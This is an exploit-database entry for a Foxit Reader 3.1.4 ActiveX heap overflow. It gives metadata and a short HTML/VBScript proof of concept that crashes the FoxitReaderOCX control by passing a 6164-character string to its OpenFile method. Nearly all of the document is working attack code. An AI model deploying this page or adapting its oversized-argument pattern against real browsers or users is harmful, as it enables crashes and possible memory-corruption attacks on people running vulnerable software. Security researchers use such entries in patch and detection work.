EXPLOITS

Foxit Reader 3.1.4.1125 - ActiveX Heap Overflow (PoC)

Author: SarBoT511 & D3V!L FUCKER
type: dos
platform: windows
port: 
date_added: 2010-01-18  
date_updated: 2011-07-21  
verified: 1  
codes: OSVDB-74315  
tags:   
aliases:   
screenshot_url:   
application_url: http://www.exploit-db.comFoxitReader31_enu_Setup_091125.exe  

raw file: 11196.html  

#Vendor :www.foxitsoftware.com
#tested on :[windows 7]
#Foxit Reader Version 3.1.4.1125

<html>
<object classid='clsid:05563215-225C-45EB-BB34-AFA47217B1DE' id='target' ></object>
<script language='vbscript'>

targetFile = "C:\Program Files\Foxit Software\Foxit Reader\plugins\FoxitReaderOCX.ocx"
prototype  = "Function OpenFile ( ByVal strFilePath As String ) As Boolean"
memberName = "OpenFile"
progid     = "FOXITREADEROCXLib.FoxitReaderOCX"
argCount   = 1

arg1=String(6164, "A")

target.OpenFile arg1

</script>